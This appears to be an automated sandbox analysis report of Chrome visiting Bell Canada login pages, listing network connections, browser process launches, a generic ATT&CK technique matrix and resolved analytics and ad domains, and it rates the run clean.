Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50364
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50363
Source: unknownNetwork traffic detected: HTTP traffic on port 50654 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50535
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50534
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50537
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50536
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50538
Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50531
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50533
Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50536 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50546
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50545
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50548
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50547
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50549
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50540
Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50542
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50541
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50544
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50543
Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50663 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50557
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50559
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
Source: unknownNetwork traffic detected: HTTP traffic on port 50548 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50551
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50552
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50554
Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50568
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50569
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50566
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50565
Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
Source: unknownNetwork traffic detected: HTTP traffic on port 50617 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49787 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50262 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50470 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50472 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50473 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50474 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:50497 version: TLS 1.2
Source: classification engineClassification label: clean1.win@37/480@197/54
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mybell.bell.ca/Login?language=en"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4184 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://m.bell.ca/getapploginpage
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 --field-trial-handle=1064,i,6441221849923588881,12403408043935428112,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://m.bell.ca/supportrqcode
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1616 --field-trial-handle=2012,i,16209123222516514220,5828609412293976285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4184 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 --field-trial-handle=1064,i,6441221849923588881,12403408043935428112,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1616 --field-trial-handle=2012,i,16209123222516514220,5828609412293976285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546108 URL: https://mybell.bell.ca/Logi... Startdate: 31/10/2024 Architecture: WINDOWS Score: 1 35 udc-neb.kampyle.com 2->35 37 t.clarity.ms 2->37 39 5 other IPs or domains 2->39 7 chrome.exe 9 2->7         started        10 chrome.exe 2->10         started        12 chrome.exe 2->12         started        14 chrome.exe 2->14         started        process3 dnsIp4 41 192.168.2.9, 443, 49704, 49706 unknown unknown 7->41 43 239.255.255.250 unknown Reserved 7->43 16 chrome.exe 7->16         started        19 chrome.exe 6 7->19         started        21 chrome.exe 7->21         started        23 chrome.exe 10->23         started        25 chrome.exe 12->25         started        process5 dnsIp6 29 87.248.119.251, 443, 50057 YAHOO-DEBDE United Kingdom 16->29 31 dcs-ups.g03.yahoodns.net 87.248.119.252, 443, 50026 YAHOO-DEBDE United Kingdom 16->31 33 100 other IPs or domains 16->33 27 conhost.exe 19->27         started        process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
https://developers.google.com/recaptcha/docs/faq#localhost_support0%URL Reputationsafe
https://support.google.com/recaptcha/#61759710%URL Reputationsafe
https://support.google.com/recaptcha0%URL Reputationsafe
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que0%URL Reputationsafe
https://sc-static.net/scevent.min.js0%URL Reputationsafe
https://www.clarity.ms/tag/uet/0%URL Reputationsafe
https://developers.google.com/youtube/iframe_api_reference#Events0%URL Reputationsafe
https://cloud.google.com/contact0%URL Reputationsafe
http://kenwheeler.github.io/slick0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
app.link
18.239.18.118
truefalse
    unknown
    fp2e7a.wpc.phicdn.net
    192.229.221.95
    truefalse
      unknown
      platform.twitter.map.fastly.net
      199.232.188.157
      truefalse
        unknown
        collection.decibelinsight.net
        130.61.120.2
        truefalse
          unknown
          stats.g.doubleclick.net
          64.233.167.157
          truefalse
            unknown
            adobetarget.data.adobedc.net
            66.235.152.225
            truefalse
              unknown
              ps.eyeota.net
              18.184.216.10
              truefalse
                unknown
                scontent.xx.fbcdn.net
                157.240.0.6
                truefalse
                  unknown
                  t.co
                  172.66.0.227
                  truefalse
                    unknown
                    bell.app.link
                    18.239.18.88
                    truefalse
                      unknown
                      sync.crwdcntrl.net
                      54.194.72.83
                      truefalse
                        unknown
                        d1tcwf12y4kqv3.cloudfront.net
                        18.65.39.29
                        truefalse
                          unknown
                          cm.g.doubleclick.net
                          142.250.185.130
                          truefalse
                            unknown
                            www.google.com
                            216.58.206.36
                            truefalse
                              unknown
                              dcs-ups.g03.yahoodns.net
                              87.248.119.252
                              truefalse
                                unknown
                                dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                52.50.97.18
                                truefalse
                                  unknown
                                  custom.bnc.lt
                                  52.9.108.223
                                  truefalse
                                    unknown
                                    medallia2.map.fastly.net
                                    146.75.117.230
                                    truefalse
                                      unknown
                                      match.adsrvr.org
                                      52.223.40.198
                                      truefalse
                                        unknown
                                        siteimproveanalytics.com
                                        188.114.96.3
                                        truefalse
                                          unknown
                                          ax-0001.ax-dc-msedge.net
                                          150.171.29.10
                                          truefalse
                                            unknown
                                            s.twitter.com
                                            104.244.42.3
                                            truefalse
                                              unknown
                                              cdn.branch.io
                                              18.66.27.34
                                              truefalse
                                                unknown
                                                s.amazon-adsystem.com
                                                98.82.156.107
                                                truefalse
                                                  unknown
                                                  sc-static.net
                                                  143.204.207.250
                                                  truefalse
                                                    unknown
                                                    bell.ca.ssl.sc.omtrdc.net
                                                    63.140.62.17
                                                    truefalse
                                                      unknown
                                                      s-part-0017.t-0009.fb-t-msedge.net
                                                      13.107.253.45
                                                      truefalse
                                                        unknown
                                                        mybell-on-priority.gdns.bell.ca
                                                        206.47.98.207
                                                        truefalse
                                                          unknown
                                                          ax-0001.ax-msedge.net
                                                          150.171.28.10
                                                          truefalse
                                                            unknown
                                                            youtube-ui.l.google.com
                                                            142.250.186.174
                                                            truefalse
                                                              unknown
                                                              googleads.g.doubleclick.net
                                                              142.250.186.98
                                                              truefalse
                                                                unknown
                                                                digital.lb.can.medallia.ca
                                                                147.75.178.60
                                                                truefalse
                                                                  unknown
                                                                  td.doubleclick.net
                                                                  142.250.186.98
                                                                  truefalse
                                                                    unknown
                                                                    analytics.google.com
                                                                    142.250.185.174
                                                                    truefalse
                                                                      unknown
                                                                      ml314.com
                                                                      34.117.77.79
                                                                      truefalse
                                                                        unknown
                                                                        cooladata.kampyle.com
                                                                        35.241.45.82
                                                                        truefalse
                                                                          unknown
                                                                          cdn.decibelinsight.net
                                                                          130.61.120.2
                                                                          truefalse
                                                                            unknown
                                                                            api2.branch.io
                                                                            108.156.60.64
                                                                            truefalse
                                                                              unknown
                                                                              static.ads-twitter.com
                                                                              unknown
                                                                              unknownfalse
                                                                                unknown
                                                                                vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.net
                                                                                unknown
                                                                                unknownfalse
                                                                                  unknown
                                                                                  t.clarity.ms
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    www.bell.ca
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      unknown
                                                                                      cm.everesttech.net
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        m.bell.ca
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          unknown
                                                                                          trial-eum-clientnsv4-s.akamaihd.net
                                                                                          unknown
